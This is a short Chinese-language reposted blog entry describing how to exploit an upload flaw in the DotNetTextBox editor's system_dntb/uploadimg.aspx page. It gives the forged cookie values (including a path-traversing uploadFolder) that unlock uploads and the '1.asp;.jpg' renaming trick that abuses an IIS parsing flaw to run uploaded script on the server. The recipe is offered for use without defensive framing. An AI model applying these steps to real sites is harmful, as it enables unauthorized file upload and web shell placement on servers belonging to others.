(转载)DotNetTextBox编辑器漏洞(system_dntb漏洞)
2020-11-24 01:06
阅读:942
标签:style blog ext color width 2014 关键字:system_dntb/
(转载)DotNetTextBox编辑器漏洞(system_dntb漏洞),搜素材,soscw.com (转载)DotNetTextBox编辑器漏洞(system_dntb漏洞) 标签:style blog ext color width 2014 原文地址:http://www.cnblogs.com/elliottc/p/3703416.html
确定有 system_dntb/uploadimg.aspx
并能打开,这时候是不能上传的,由于他是验证cookie来得出上传后的路径,这样我们可以用cookie欺骗工具。
cookie:UserType=0;
IsEdition=0; Info=1;
uploadFolder=../system_dntb/Upload/;
路径可以修改,只是权限够,上传后改名为1.asp;.jpg利用iis解析漏洞。
文章来自:搜素材网的编程语言模块,转载请注明文章出处。
文章标题:(转载)DotNetTextBox编辑器漏洞(system_dntb漏洞)
文章链接:http://soscw.com/essay/22252.html
文章标题:(转载)DotNetTextBox编辑器漏洞(system_dntb漏洞)
文章链接:http://soscw.com/essay/22252.html
评论
亲,登录后才可以留言!